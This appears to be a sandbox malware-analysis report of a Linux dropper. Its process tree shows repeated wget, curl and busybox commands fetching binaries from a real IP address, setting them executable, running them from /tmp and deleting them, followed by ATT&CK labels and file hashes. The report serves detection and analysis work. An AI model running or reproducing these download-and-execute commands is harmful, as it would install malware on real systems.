/usr/bin/curlcurl -O http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:1652
-
-
/bin/chmodchmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Executes dropped EXE
PID:1654
-
-
/bin/rmrm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:1658
-
-
/bin/chmodchmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:1664
-
-
/bin/chmodchmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:1670
-
-
/bin/chmodchmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:1673
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:1674
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Writes file to tmp directory
PID:1675
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:1676
-
-
/bin/chmodchmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- File and Directory Permissions Modification
PID:1677
-
-
/tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Executes dropped EXE
PID:1678
-
-
/bin/rmrm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:1679
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:1680
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Writes file to tmp directory
PID:1681
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:1682
-
-
/bin/chmodchmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- File and Directory Permissions Modification
PID:1683
-
-
/tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Executes dropped EXE
PID:1684
-
-
/bin/rmrm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:1685
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97